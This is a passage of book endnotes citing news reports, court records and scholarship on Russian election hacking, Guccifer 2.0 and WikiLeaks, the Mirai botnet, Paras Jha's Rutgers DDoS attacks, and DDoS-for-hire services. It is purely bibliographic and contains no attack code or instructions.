Executive Order 12333: The White House, Executive Order 12333: United States Intelligence Activities, 40 Fed. Reg. 59,941 (Dec. 4, 1981), as amended by Executive Order 13284, 68 Fed. Reg. 4,077 (Jan. 23, 2003), and by Executive Order 13355 and further amended by Executive Order 13470, 73 Fed. Reg. 45,328 (2008).
Obama apologized: David E. Sanger, “Obama Panel Said to Urge NSA Curbs,” The New York Times, December 12, 2013.
BND: Maik Baumgärtner, Martin Knobbe, and Jörg Schindler, “BND schnüffelte auch im Weißen Haus,” Der Spiegel, June 22, 2017, https://www.spiegel.de/politik/ausland/bundesnachrichtendienst-schnueffelte-im-weissen-haus-a-1153306.html.
“organized hypocrisy”: Stephen Krasner, Sovereignty: Organized Hypocrisy (Princeton, NJ: Princeton University Press, 1999).
Russian hacking of the United States: The first known hacking operation conducted by the Russian Federation against the United States began in 1996. The FBI investigation to uncover the hacks was called Moonlight Maze. Newsweek staff, “We Are in the Middle of a Cyberwar,” Newsweek, September 19, 1999, https://www.newsweek.com/were-middle-cyerwar-166196. See also Fred Kaplan, Dark Territory: The Secret History of Cyber War (New York: Simon and Schuster, 2016), 78–88; Juan Andres Guerrero-Saade et al., “Penquin’s Moonlit Maze: The Dawn of Nation-State Digital Espionage,” Securelist, Kaspersky Lab, April 3, 2017, https://ridt.co/d/jags-moore-raiu-rid.pdf.
Russia infiltrated the State Department’s: Ellen Nakashima, “New Details Emerge about 2014 Russian Hack of the State Department: It Was ‘Hand to Hand Combat,’” The Washington Post, October 3, 2017; Michael S. Schmidt and David E. Sanger, “Russian Hackers Read Obama’s Unclassified Emails, Officials Say,” The New York Times, April 25, 2015.
White House’s unclassified network: Ellen Nakashima, “Hackers Breach Some White House Computers,” The Washington Post, October 28, 2014.
Pentagon’s unclassified system: Jamie Crawford, “Russians Hacked Pentagon Network, Carter Says,” CNN, June 4, 2015, https://www.cnn.com/2015/04/23/politics/russian-hackers-pentagon-network/index.html.
Joint Chiefs of Staff: Craig Whitlock and Missy Ryan, “U.S. Suspects Russia in Hack of Pentagon Computer Network,” The Washington Post, August 6, 2015.
On Tuesday, June 14: Nakashima, “Russian Government Hackers.”
To corroborate Nakashima’s bombshell: Dmitri Alperovitch, “Bears in the Midst: Intrusion into the Democratic National Committee,” June 14, 2016, in “CrowdStrike’s Work with the Democratic National Committee.”
Lehel chose the handle: Andrew Higgins, “For Guccifer, Hacking Was Easy. Prison Is Hard,” The New York Times, November 10, 2014.
In 2013, Guccifer hacked: “Hacker Targets Clinton Confidant in New Attack,” The Smoking Gun, March 15, 2013, http://www.thesmokinggun.com/documents/sidney-blumenthal-email-hack-687341. When he was released on parole in 2018, Guccifer was extradited to the United States, where he is currently serving a fifty-two-month sentence in federal prison.
The first blog entry: “Guccifer 2.0: DNC’s Servers Hacked by a Lone Hacker,” Guccifer2.0.wordpress, June 15, 2016, https://guccifer2.wordpress.com/2016/06/15/dnc/.
posted numerous pilfered documents: “Emails Guccifer 2.0 claimed were DNC documents when he released them on June 15 came, instead, from John Podesta. It wasn’t until July 6 that the Guccifer 2.0 documents billed as DNC ones actually were.” “2016: Guccifer 2 and the Podesta Emails,” The Llama Files, May 28, 2017, https://jimmysllama.com/2017/05/28/9867/.
attached to an exfiltrated Podesta email: https://WikiLeaks.org/podesta-emails/emailid/26562.
Records attached to another: Spreadsheet attached to Podesta email: https://WikiLeaks.org/podesta-emails/emailid/3016.
Both media outlets: Sam Bittle and Gabriel Bluestone, “This Looks Like the DNC’s Hacked Trump Oppo File,” Gawker, June 15, 2016, https://gawker.com/this-looks-like-the-dncs-hacked-trump-oppo-file-1782040426; “DNC Hacker Releases Trump Oppo Report,” The Smoking Gun, June 15, 2016, http://www.thesmokinggun.com/documents/crime/dnc-hacker-leaks-trump-oppo-report-647293. Trump responded that the DNC hacked itself. John Santucci (@Santucci), “New Trump Statement on Gawker,” Twitter, June 15, 2016, https://twitter.com/Santucci/status/743194156739108865. Guccifer 2.0 told the editor of The Smoking Gun: “I sent a big part of docs to WikiLeaks.” See Raffi Khatchadourian, “What the Latest Mueller Indictment Reveals About WikiLeaks’ Ties to Russia—and What It Doesn’t,” The New Yorker, July 24, 2018, https://www.newyorker.com/news/newsdesk/what-the-latest-mueller-indictment-reveals-about-WikiLeaks-ties-to-russia-and-what-it-doesnt.
“I’m a hacker, manager, philosopher, woman lover”: Lorenzo Franceschi-Bicchierai, “Here’s the Full Transcript of Our Interview with DNC Hacker ‘Guccifer 2.0,’” Motherboard, Vice, June 21, 2016, https://www.vice.com/en/article/yp3bbv/dnc-hacker-guccifer-20-full-interview-transcript.
urged Guccifer: United States of America v. Defendants, 17–18.
On July 18: United States of America v. Defendants, 18.
@WikiLeaks tweeted: WikiLeaks (@WikiLeaks), “RELEASE: 19,252 Emails from the US Democratic National Committee,” Twitter, July 22, 2016, https://twitter.com/WikiLeaks/status/756501723305414656.
searchable database: Database of DNC emails: https://WikiLeaks.org//dnc-emails/. The web page announced, “Today, Friday 22 July 2016 at 10:30am EDT, WikiLeaks releases 19,252 emails and 8,034 attachments from the top of the US Democratic National Committee—part one of our new Hillary Leaks series.” Tom Hamburger and Karen Tumulty, “WikiLeaks Releases Thousands of Documents About Clinton and Internal Deliberations,” The Washington Post, July 22, 2016. At present, the website boasts 44,053 emails and 17,761 attachments, from the accounts of seven key figures in the DNC: Communications Director Luis Miranda (10,520 emails), National Finance Director Jordon Kaplan (3,799 emails), Finance Chief of Staff Scott Comer (3,095 emails), Finanace Director of Data and Strategic Initiatives Daniel Parrish (1,742 emails), Finance Director Allen Zachary (1,611 emails), Senior Adviser Andrew Wright (938 emails), and Northern California Finance Director Robert (Erik) Stowe (751 emails). The emails cover the period from January l, 2015, to May 25, 2016.
on his atheism: Email: https://WikiLeaks.org/dnc-emails/emailid/7643. See also Michelle Boorstein and Julie Zauzmer, “WikiLeaks: Democratic Party Officials Appear to Discuss Using Sanders’s Faith Against Him,” The Washington Post, July 22, 2016.
“I told you a long time ago”: Hayley Walker, “Bernie Sanders Calls for Debbie Wasserman Schultz to Resign in Wake of Email Leaks,” ABC News, July 24, 2016, https://abcnews.go.com/ThisWeek/bernie-sanders-calls-wasserman-schultz-resign-wake-dnc/story?id=40824983.
toothpaste back in the tube: Elizabeth Jensen, “How Should NPR Report on Hacked WikiLeak Emails?,” NPR, https://www.npr.org/sections/publiceditor/2016/10/19/498444943/how-should-npr-report-on-hacked-wikileaks-emails. See generally, Nieman Reports, “When Is It Ethical to Publish Stolen Data?,” Nieman Reports, https://niemanreports.org/articles/when-is-it-ethical-to-publish-stolen-data/.
the next day: Donald Trump (@realDonaldTrump), “Leaked e-mails of DNC show plans to destroy Bernie Sanders,” Twitter, July 23, 2016, https://twitter.com/realDonaldTrump/status/756804886038192128.
from Russia: Alex Johnson, “WikiLeaks’ Julian Assange: ‘No Proof’ Hacked DNC Emails Came from Russia,” NBC News, July 25, 2016, https://www.nbcnews.com/news/us-news/WikiLeaks-julian-assange-no-proof-hacked-dnc-emails-came-russia-n616541.
inside job: Interview with Amy Goodman, “WikiLeaks’ Julian Assange on Releasing DNC Emails That Ousted Debbie Wasserman Schultz,” July 25, 2016, https://www.democracynow.org/2016/7/25/exclusive_WikiLeaks_julian_assange_on_releasing.
“I mean, it could be”: First presidential debate of 2016, CNN, September 26, 2016, http://www.cnn.com/TRANSCRIPTS/1609/26/se.01.html.
“Guccifer 2.0”: Roger Stone, “Dear Hillary: DNC Hack Solved, So Now Stop Blaming Russia,” Breitbart.com, August 5, 2016, https://www.breitbart.com/politics/2016/08/05/dear-hillary-dnc-hack-solved-so-now-stop-blaming-russia/.
no previous online presence: Lorenzo Franceschi-Bicchierai, “‘Guccifer 2.0’ Is Likely a Russian Government Attempt to Cover Up Its Own Hack,” Vice, June 16, 2016, https://www.vice.com/en_us/article/wnxgwq/guccifer-20-is-likely-a-russian-government-attempt-to-cover-up-their-own-hack.
“That’s how a blown operation”: thaddeus t. grugq, “The Russian Way of Cyberwar: Information, Disinformation and Influence,” Medium, January 10, 2017, https://medium.com/@thegrugq/the-russian-way-of-cyberwar-edb9d52b4876.
anomalies quickly emerged: Some analysts initially suspected that these anomalies were intentional feints. See, e.g., “On Metadata and Manipulation: The First Guccifer 2.0 Documents,” emptywheel, November 3, 2017, https://www.emptywheel.net/2017/11/03/on-metadata-and-manipulation-the-first-guccifer-2–0-documents/?print=print.
files had been doctored: Haley Byrd, “This Former British Spy Exposed the Russian Hackers,” The Washington Examiner, July 25, 2018, https://www.washingtonexaminer.com/weekly-standard/this-former-british-spy-exposed-the-russian-hackers.
no evidence of tampering: In one instance, Guccifer 2.0 posted an old document (metadata suggesting 2008) leaked by the original Guccifer in 2013, but superimposed a “Secret” watermark on the document, instead of the original “Confidential.” See Thomas Rid (@RidT), “We know this because that file was already leaked in 2013, as ‘confidential,’ not secret—by the original Guccifer,” Twitter, November 3, 2017, https://twitter.com/RidT/status/926597748379570176.
pirated version of Microsoft Office: Florian Wagner, @_fl01, “Get it;),” Twitter, June 15, 2016, https://twitter.com/_fl01/status/743226251373060097.
Secureworks found: “Between October 2015 and May 2016, CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service”: Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 16, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign; “CTU researchers analyzed 4,396 phishing URLs sent to 1,881 Google Accounts between March and September, 2015”: Secureworks Counter Threat Unit, “Threat Group–4127 Targets Google Accounts,” Secureworks, June 26, 2016, https://www.secureworks.com/research/threat-group-4127-targets-google-accounts. The AP subsequently examined 19,000 links from the Secureworks’s database covering March 2015 to May 2016. Raphael Satter et al., “Russian Hackers Pursued Putin Foes, Not Just US Democrats,” Associated Press, November 2, 2017, https://apnews.com/article/technology-entertainment-music-russia-hacking-3bca5267d4544508bb523fa0db462cb2.
to rent the proxy servers: On April 12, 2016, Fancy Bear paid $37 worth of Bitcoin to the Romanian web-hosting service THCServers.com: Satter, Donn, and Day, “Inside Story.” This company runs “bulletproof” servers, so named because THCServers refuses to cooperate with law enforcement. The Romanian company ignores state requests for information.
Professor Thomas Rid: Thomas Rid, @RidT, “.@pwnallthethings Remarkably the same C2 IP,” Twitter, July 8, 2016, https://twitter.com/ridt/status/751325844002529280. In addition to being a participant in the story, Professor Rid has written a terrific account of the hacks from which I have learned a great deal. Thomas Rid, Active Measures: The Secret History of Disinformation and Political Warfare (New York: Farrar, Straus and Giroux, 2020), 377–96.
Germany’s intelligence service: BBC News, “Russia ‘Was Behind German Parliament Hack,’” May 13, 2016, https://www.bbc.com/news/technology-36284447.
same security certificates: Thomas Rid, @RidT, “.@pwnallthethings This SSL certificate,” Twitter, July 11, 2016, https://twitter.com/RidT/status/752528393678225408.
Guccifer 2.0’s true identity: Kevin Paulsen and Spencer Ackerman, “Lone DNC Hacker Guccifer 2.0 Slips Up and Revealed He Was a Russian Intelligence Officer,” The Daily Beast, https://www.thedailybeast.com/exclusive-lone-dnc-hacker-guccifer-20-slipped-up-and-revealed-he-was-a-russian-intelligence-officer.
Putin answered: “Putin Discusses Trump, OPEC, Rosneft, Brexit, Japan (Transcript),” Bloomberg, September 5, 2016, https://www.bloomberg.com/news/articles/2016-09-05/putin-discusses-trump-opec-rosneft-brexit-japan-transcript.
Hillary Clinton’s support for: Putin has reportedly blamed Hillary Clinton for instigating mass protests against him in 2011. Miriam Elder, “Vladimir Putin Accuses Hillary Clinton of Encouraging Russian Protests,” The Guardian, December 8, 2011.
Putin’s desire for revenge: Mike Eckel, “Clinton Calls for Tougher Response to Russia on Ukraine, Syria,” September 9, 2015, Radio Free Europe, https://www.rferl.org/a/russia-us-clinton-calls-for-tougher-response-on-ukraine-syria/27235800.html; Amy Chozick, “Clinton Says ‘Personal Beef’ by Putin Led to Hacking Attacks,” The New York Times, December 16, 2016. The Intelligence Community report later concluded that Russia was trying “to help President-elect Trump’s election chances when possible by discrediting Secretary Clinton and publicly contrasting her unfavorably to him”: Intelligence Community Assessment, “Assessing Russian Activities and Intentions in Recent US Elections,” United States Senate, January 6, 2017, ii, https://www.intelligence.senate.gov/sites/default/files/documents/ICA_2017_01.pdf. The report also noted that the CIA and the FBI had high confidence in this judgment; NSA had moderate confidence.
2016 election: Sam Biddle, “A Swing-State Election Vendor Repeatedly Denied Being Hacked by Russians. The New Mueller Indictment Says Otherwise,” The Intercept, July 13, 2018, https://theintercept.com/2018/07/13/a-swing-state-election-vendor-repeatedly-denied-being-hacked-by-russians-new-mueller-indictment-says-otherwise/.
“where it will end up”: David E. Sanger, The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age (New York: Crown, 2018), 224.
weaponize it: Hackers call this type of operation “hack-and-leak.” Gabriella Coleman has termed it a public interest hack: “a hack that will interest the public due to the hack and the data/documents.” Coleman claims that the hacktivist collective known as Anonymous innovated the public-interest hack around 2007: Gabriella Coleman, “The Public Interest Hack,” Limn, 2017, https://limn.it/articles/the-public-interest-hack.
released the memo: “Joint Statement from the Department of Homeland Security and Office of the Director of National Intelligence on Election Security,” October 7, 2016, https://www.dhs.gov/news/2016/10/07/joint-statement-department-homeland-security-and-office-director-national.
Putin’s name: The Intelligence Community Assessment, later posted on January 6, 2017, did name Putin: “We assess Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the US presidential election”: Intelligence Community Assessment, “Assessing Russian Activities,” ii.
Trump’s political advisers: Stephen Bannon testified before the Senate Select Committee on Intelligence that Trump’s debate preparation team first heard of the tape about an hour prior to its public release. See Select Committee on Intelligence, United States Senate on Russian Active Measures Campaigns and Interference in the 2016 U.S. Election, vol. 5: Counterintelligence Threats and Vulnerabilities, 249, citing Bannon testimony before the Select Committee on November 19, 2018, 206.
Roger Stone instructed: Select Committee on Intelligence, 249–50.
“wanted to see the Podesta emails”: Select Committee on Intelligence, 249.
new emails from the Podesta inbox each day: WikiLeaks released a second batch of DNC emails on November 7, 2016, a day before the election, adding 8,263 emails to its collection: Joe Uchill, “WikiLeaks Releases New DNC Emails Day Before Election,” The Hill, November 7, 2016, https://thehill.com/policy/cybersecurity/304648-WikiLeaks-releases-new-dnc-emails-suffers-cyberattack/.
only make us feel safer: Bruce Schneier, Beyond Fear: Thinking Sensibly About Security in an Uncertain World (New York: Copernicus Books, 2003).
from blowing it up: Bruce Schneier, “Is Aviation Security Mostly for Show?,” CNN, December 29, 2009, http://edition.cnn.com/2009/OPINION/12/29/schneier.air.travel.security.theater/.
“precisely calibrated attacks”: Bruce Schneier, “Someone Is Learning How to Take Down the Internet,” Lawfare, September 13, 2016, https://www.lawfareblog.com/someone-learning-how-take-down-internet.
DDoS: Schneier, “Someone Is Learning.”
processing legitimate requests: “What Is a DDoS Attack,” Cloudflare Learning Center, accessed February 24, 2021, www.cloudflare.com/learning/ddos/what-is-a-ddos-attack.
for three weeks: Ian Traynor, “Russia Accused of Unleashing Cyberwar to Disable Estonia,” The Guardian, May 16, 2007, https://www.theguardian.com/world/2007/may/17/topstories3.russia.
same basic technique: Episode 13, “The Blueprint,” written and directed by John Marks, The Weekly, from The New York Times, aired September 8, 2019, on Hulu, https://www.nytimes.com/2019/09/06/the-weekly/russia-estonia-election-cyber-attack.html?
“One week, the attack”: Schneier, “Someone Is Learning.”
“It doesn’t seem like”: Schneier, “Someone Is Learning.”
map their capabilities: Schneier, “Someone Is Learning.”
same period in 2015: Akamai Technologies, “Akamai Releases Second Quarter 2016 State of the Internet / Security Report,” Cision PR Newswire, September 14, 2016, https://www.prnewswire.com/news-releases/akamai-releases-second-quarter-2016-state-of-the-internet-security-report-300327400.html. Verisign reported a 75 percent increase during the same period: “Verisign Q2 2016 DDOS Trends: Layer 7 DDOS Attacks a Growing Trend,” Verisign (blog), August 29, 2016, https://blog.verisign.com/security/verisign-q2–2016-ddos-trends-layer-7-ddos-attacks-a-growing-trend/.
“It’s a total Wild”: Nicole Perlroth, “Hackers Used New Weapons to Disrupt Major Websites Across U.S.,” The New York Times, November 2, 2016.
“What can we do”: Schneier, “Someone Is Learning.”
cloud computing provider OVH: Octave Klaba (@olesovhcom), “Last days, we got lot of huge DDoS,” Twitter, September 22, 2016, https://twitter.com/olesovhcom/status/778830571677978624?s=20&t=EF2RadOIKuBH5Gdb8x5DUw.
1.2 terabits: Octave Klaba (@olesovhcom), “@Dominik28111 we got 2 huge multi DDoS,” Twitter, September 19, 2016, https://twitter.com/olesovhcom/status/778019962036314112.
personal video recorders: Swati Khandelwal, “World’s Largest 1 Tbps DDoS Attack Launched from 152,000 Hacked Smart Devices,” Hacker News, September 28, 2016, thehackernews.com/2016/09/DDoS-attack-iot.html.
any of its rivals: One prominent rival, the vDOS botnet, advertised their rate as “up to 50 gigabits per second”: Brian Krebs, “Israeli Online Attack Service ‘vDOS’ Earned $600,000 in Two Years,” Krebs on Security, September 8, 2016, https://krebsonsecurity.com/2016/09/israeli-online-attack-service-vdos-earned-600000-in-two-years/.
largest cloud provider in Europe: Matthew Gooding, “Is Europe’s OVHcloud Ready to Take on the US Cloud Hyperscalers?,” Tech Monitor, September 21, 2021, https://techmonitor.ai/technology/cloud/ovhcloud-ipo-cloud-computing-aws-azure.
stir up this kind of trouble?: Some noted that OVH had one controversial client: WikiLeaks. Their hosting of WikiLeaks sparked speculation that a nation-state, such as the United States, was trying to silence Julian Assange for his interference in its election. France even demanded that OVH shut WikiLeaks down: Josh Halliday and Angelique Chrisafis, “WikiLeaks: France Adds to US Pressure to Ban Website,” The Guardian, December 3, 2010.
Krebs on Security: Brian Krebs, “Krebs on Security Hit with Record DDoS,” Krebs on Security, September 21, 2016, https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/.
massive retaliation: When Krebs broke the story about the theft of 40 million credit cards from the retailing giant Target in 2013, the Ukrainian mastermind behind the black market for credit card fraud not only DDoSed Krebs’s website, but also called 911 with a spoof emergency report to make it appear as though it came from Krebs’s house. SWATting, as it is known, aims to unleash deadly force on a victim by calling the police and reporting a violent crime in action—usually a bomb threat or a hostage situation. A heavily armed team of local police showed up at Krebs’s house in suburban Fairfax, Virginia, apprehended Krebs, and put him in handcuffs before the journalist could convince them that it was a hoax: Brian Krebs, “The World Has No Room for Cowards,” Krebs on Security, March 15, 2013, krebsonsecurity.com/2013/03/the-world-has-no-room-for-cowards.
between 2012 and 2016: Elie Bursztein, “Inside the Infamous Mirai IoT Botnet: A Retrospective Analysis,” Cloudflare Blog, December 14, 2017, blog.cloudflare.com/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis.
take out a simple blog: Bursztein, “Inside the Infamous Mirai.”
crusading against cybercrime: Hiawatha Bray, “Akamai Breaks Ties with Security Expert,” The Boston Globe, September 23, 2016.
made them vanish: Eli Blumenthal and Elizabeth Weise, “Hacked Home Devices Caused Massive Internet Outage,” USA Today, October 21, 2016.
make sense of them: “Oracle DNS,” Oracle, accessed February 28, 2022, www.oracle.com/cloud/networking/dns.
began at 9:30 a.m.: Scott Hilton, “Dyn Analysis Summary of Friday October 21 Attack,” Dyn, October 26, 2016, https://web.archive.org/web/20161101171641/http:/dyn.com/
blog/dyn-analysis-summary-of-friday-october-21-attack/.
“This was not your”: Nicole Perlroth, “Hackers Used New Weapons to Disrupt Major Websites Across U.S.,” The New York Times, October 21, 2016.
voting technology standards: Perlroth, “Hackers Used New Weapons.”
internet outage map on Twitter: WikiLeaks (@WikiLeaks), “Mr. Assange is still alive,” Twitter, October 21, 2016, https://twitter.com/WikiLeaks/status/789574436219449345?ref_src=twsrc%5Etfw. The map is from DownDetector, a platform that provides information on service issues. See Blumenthal and Wiese, “Hacked Home Devices.”
Julian Assange’s internet connection: WikiLeaks claims that Ecuador shut off Assange’s internet after WikiLeaks published Clinton’s Goldman Sachs speeches on October 16: WikiLeaks (@WikiLeaks), “We can confirm Ecuador cut off Assange’s internet access Saturday, 5pm GMT, shortly after publication of Clinton’s Goldman Sachs speechs,” Twitter, October 17, 2016, https://twitter.com/WikiLeaks/status/788099178832420865. See also Mathew J. Schwartz, “Ecuador Kiboshes WikiLeaks Leader’s Internet Connection,” Data Breach Today, October 19, 2016, www.databreachtoday.com/blogs/ecuador-kiboshes-WikiLeaks-leaders-internet-connection-p-2289, as See also Eric Geller and Tony Romm, “WikiLeaks Supporters Claim Credit for Massive U.S. Cyberattack, but Researchers Skeptical,” Politico, October 21, 2016, https://www.politico.com/story/2016/10/websites-down-possible-cyber-attack-230145.
launch a cyberwar?: White House spokesperson responded, “I know the Department of Homeland Security … is monitoring this situation, and they’ll take a close look at it”: Eric Geller (@ericgeller), “At briefing just now, @PressSec said DHS was monitoring the Dyn DDoS,” Twitter, October 21, 2016, https://twitter.com/ericgeller/status/789501608904257536?s=21.
first DDoS attack: See Garrett Graff, “How a Dorm Room Minecraft Scam Brought Down the Internet,” Wired, December 13, 2017, www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet; “Computer Hacker Who Launched Attacks on Rutgers University Ordered to Pay $8.6m Restitution; Sentenced to Six Months Home Incarceration,” Department of Justice, Office of Public Affairs, October 26, 2018, https://www.justice.gov/usao-nj/pr/computer-hacker-who-launched-attacks-rutgers-university-ordered-pay-86m-restitution; Katie Park, “Police Investigate Rutgers Cyber Attack,” The Daily Targum, November 23, 2014, dailytargum.com/article/2014/11/police-investigate-rutgers-cyber-attack.
Paras’s classmates: Park, “Police Investigate Rutgers.”
2.3 percent tuition increase: Kelly Heyboer, “Who Hacked Rutgers? University Spending Up to $3M to Stop Next Cyber Attack,” NJ, August 23, 2015, www.nj.com/education/2015/08/who_hacked_rutgers_university_spending_up_to_3m_to.html.
delay his calculus exam: United States District Court for the Court of Alaska, United States of America v. Paras Jha, Sentencing Memo, September 11, 2018, 20, https://regmedia.co.uk/2018/09/20/mirai.pdf.
precisely 8:15 p.m.: Lauren Niesz, “Online Hack Attacks: Is ‘MU-SECURE’?,” The Outlook, April 29, 2015, outlook.monmouth.edu/news/30-volume-86-fall-2014-spring-2015/2589-online-hack-attacks-is-mu-secure.
another assault on Rutgers: Katie Park, “Rutgers Network Crumples Under Siege by DDoS Attack,” The Daily Targum, March 30, 2015, https://dailytargum.com/article/2015/03/rutgers-network-crumples-under-siege-by-ddos-attack.
a friend later reported: Brian Krebs, “Who Is Anna-Senpai, the Mirai Worm Author?,” Krebs on Security, January 18, 2017, krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author.
conceal his identity: The post is here: “@Rutgers Community,” Pastebin, April 29, 2015, pastebin.com/9d0vRep8. Brian Krebs connected the post to Paras. See Krebs, “Who Is Anna-Senpai?”
fourth attack on the Rutgers: Kelly Heyboer, “Who Hacked Rutgers: University Spending up to $3M to Stop Next Cyber Attack,” NJ.Com, August 23, 2015, https://www.nj.com/education/2015/08/who_hacked_rutgers_university_spending_up_to_3m_to.html.
ProTraf Solutions: According to the Wayback Machine, ProTraf Solutions had a Web presence on March 4, 2015, the date of the second DDoS attack. See pweb .archive.org/web/20150304050230/http://www.ProTrafsolutions.com/clientarea.php.
ProTraf over Incapsula: Krebs, “Who Is Anna-Senpai?”
the only provider: See, e.g., Federico Varese, Mafias on the Move: How Organized Crime Conquers New Territory (Princeton, NJ: Princeton University Press, 2011).
she gasped: 30 Rock, season 5, episode 3.
rackets on their subjects: Charles Tilly, Coercion, Capital, and European States, AD 990–1992 (Cambridge: Basil Blackwell, 1990), 68–70.
“making it criminal”: Tilly, Coercion, Capital, 69.
their own making: Tilly, Coercion, Capital, 69–70.
Central New Jersey: Alexis Tarrazi, “Fanwood Man Responsible for Rutgers University Hack Pleads Guilty,” Patch, December 13, 2017, https://patch.com/new-jersey/scotchplains/fanwood-man-responsible-rutgers-university-hack-pleads-guilty.
bullied by other children: U.S. District Court for the Court of Alaska, United States of America v. Paras Jha, Sentencing Memo, September 11, 2018, 11, https://regmedia.co.uk/2018/09/20/mirai.pdf.
he was transfixed: Sentencing Memo, 10–12.
would have helped him: Sentencing Memo, 12–13.
pushed him even harder: Sentencing Memo, 13–14.
he was twelve and was hooked: According to Paras, “My first reaction to programming was, ‘Look what I can do!’”: Paras Jha, “I Am Paras Jha,” Internet Archive, accessed June 13, 2021, web.archive.org/web/20140122005106/http://parasjha.info. This website claims that Paras learned to code in eighth grade, but in the Wired story, Graff, “How a Dorm Room,” Paras is said to have learned how to code in seventh grade (based on his old LinkedIn page). On his current LinkedIn, Paras said he learned to code when he was twelve: https://www.linkedin.com/in/parasjha.
success and affirmation: Sentencing Memo, 15.
exhibit his work: Krebs, “Who Is Anna-Senpai?”
since buying the game in 2014: “Minecraft for Windows,” Minecraft, accessed February 27, 2022, https://www.minecraft.net/en-us/store/minecraft-windows10.
55 million users play it: Tom Warren, “Minecraft Still Incredibly Popular as Sales Top 200 Million and 126 Million Play Monthly,” Verge, May 18, 2020, www.theverge.com/platform/amp/2020/5/18/21262045/minecraft-sales-monthly-players-statistics-youtube. This is up from the 100 million Warren reported in 2016: Tom Warren, “Minecraft Sales Top 100 Million,” Verge, June 2, 2016, www.theverge.com/2016/6/2/11838036/minecraft-sales-100-million.
$100,000 a month: Graff, “How a Dorm Room.” Note that Krebs claims $50,000/month: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/.
“seeing others enjoy my work”: Jha, “I Am Paras Jha.”
DDoS attacks: Sentencing Memo, 16.
launch these attacks themselves: Sentencing Memo, 17.
“But for the server operators”: Krebs, “Who Is Anna-Senpai?”
targets of these attacks: Sentencing Memo, 18.
attacks on Minecraft servers: Krebs, “Who Is Anna-Senpai?”
his personal website: Jha, “I Am Paras Jha.” Note that ProTraf’s early iteration was called Switchnet.
“ever since 2009”: “About Us|ProTraf Solutions,” ProTraf, Internet Archive, accessed June 13, 2021, web.archive.org/web/20160528163331/https://www.
ProTrafsolutions.com/about.
Minecraft DDoS experts: Sentencing Memo, 15, 18–19.
put on academic probation: Sentencing Memo, 20.
“States make war and vice versa”: Tilly, Coercion, Capital, 67.
revenues dwindle: Tilly, Coercion, Capital, 67.
gang known as VDoS: Krebs, “Israeli Online Attack Service.”
providing these services for four years: Krebs, “Israeli Online Attack Service.”
from Israel in 2012: Brian Krebs, “Alleged VDOS Proprietors Arrested in Israel,” Krebs on Security, September 10, 2016, https://krebsonsecurity.com/2016/09/alleged-vdos-proprietors-arrested-in-israel.
Denial of Service attacks: Single computers might take out a website if they use a “reflection” attack. See generally Todd Booth and Karl Andersson, “Network Security of Internet Services: Eliminate DDoS Reflection Amplification Attacks,” Journal of Internet Services and Information Security 5, no. 3 (2015), 58–79.
murderous organization’s website: Tim Lee, “The New York Times Web Site Was Taken Down by DNS Hijacking. Here’s What That Means,” The Washington Post, August 27, 2013.
distributed zombie computers: Ellen Messmer, “Experts Link Flood of ‘Canadian Pharmacy’ Spam to Russian Botnet Criminals,” The New York Times, July 16, 2009.
over three years: Brian Krebs, “Top Spam Botnet, ‘Grum,’ Unplugged,” Krebs on Security, July 19, 2012, krebsonsecurity.com/2012/07/top-spam-botnet-grum-unplugged; Brian Krebs, “Who’s Behind the World’s Largest Spam Botnet?,” Krebs on Security, February 1, 2012, http://krebsonsecurity.com/2012/02/whos-behind-the-worlds-largest-spam-botnet.
issuing orders: Two main kinds of botnets are Server-Client, where the botmaster directly controls the bots through a C2, and Peer-to-Peer, where the botmaster uses the bots themselves to relay orders. See generally Basheer Al-Durwairi and Moath Jarrah, “Botnet Architectures: A State-of-the-Art Review,” in Botnets: Architectures, Countermeasures, and Challenges, ed. Georgious Kambourakis et al. (Boca Raton, FL: CRC Press, 2020), 10–18.
Himilayan Kingdom of Bhutan: James Wyke, “Over 9 Million PCs Infected—ZeroAccess Botnet Uncovered,” Naked Security, September 19, 2012, https://nakedsecurity.sophos.com/2012/09/19/zeroaccess-botnet-uncovered/.
primitive botnet: MafiaBoy gained illegal access to seventy-five computers in fifty-two different networks; forty-eight of the fifty-two networks were at universities: James Evan, “Mafiaboy’s Story Points to Net Weaknesses,” IT World Canada, January 26, 2001, www.itworldcanada.com/article/mafiaboys-story-points-to-net-weaknesses/29212.
national security threat: Special White House Briefing, “Meeting with Internet Security Groups,” CSPAN, February 15, 2000, https://www.c-span.org/video/?155435–1/internet-security.
Denial of Service attacks: FBI National Press Office, “Mafiaboy Pleads Guilty,” FBI, January 19, 2001, archives.fbi.gov/archives/news/pressrel/press-releases/mafiaboy-pleads-guilty.
five months in juvenile detention: Rebecca Hersher, “Meet Mafiaboy, the ‘Bratty Kid’ Who Took Down the Internet,” NPR, February 7, 2015, choice.npr.org/index.html?origin=https://www.npr.org/sections/alltechconsidered/2015/02/07/384567322/meet-mafiaboy-the-bratty-kid-who-took-down-the-internet.
did it for the money: Krebs, “Israeli Online Attack Service.”
DDoS as a service: See Ryan Francis, “Hire a DDoS Service to Take Down Your Enemies,” CSO Online, March 15, 2017, www.csoonline.com/article/3180246/hire-a-ddos-service-to-take-down-your-enemies.html; Mohammad Karami and Damon McCoy, “Understanding the Emerging Threat of DDoS-as-a-Service” (paper presented at USENIX Workshop on Large-Scale Exploits and Emergent Threats, LEET 13, Washington, DC, August 12, 2013), www.usenix.org/system/files/conference/leet13/leet13-paper_karami.pdf; Mohammad Karami and Damon McCoy, “Rent to Pwn: Analyzing Commodity Booter DDoS Services,” login: TheUSENIX Magazine 38, no. 6 (December 2013): 20–23, https://www.usenix.org/system/files/login/articles/05_karami-online.pdf.
stressor services: Booter comes from the malicious act of “booting” a game’s player out of an online game, but stressor has a benign meaning in that it refers to stress tests performed against one’s own servers to assess their resilience: Alice Hutchings and Richard Clayton, “Exploring the Provision of Online Booter Services,” Deviant Behavior 37, no. 10 (May 2016): 1163–78, https://www.repository.cam.ac.uk/bitstream/handle/1810/252340/
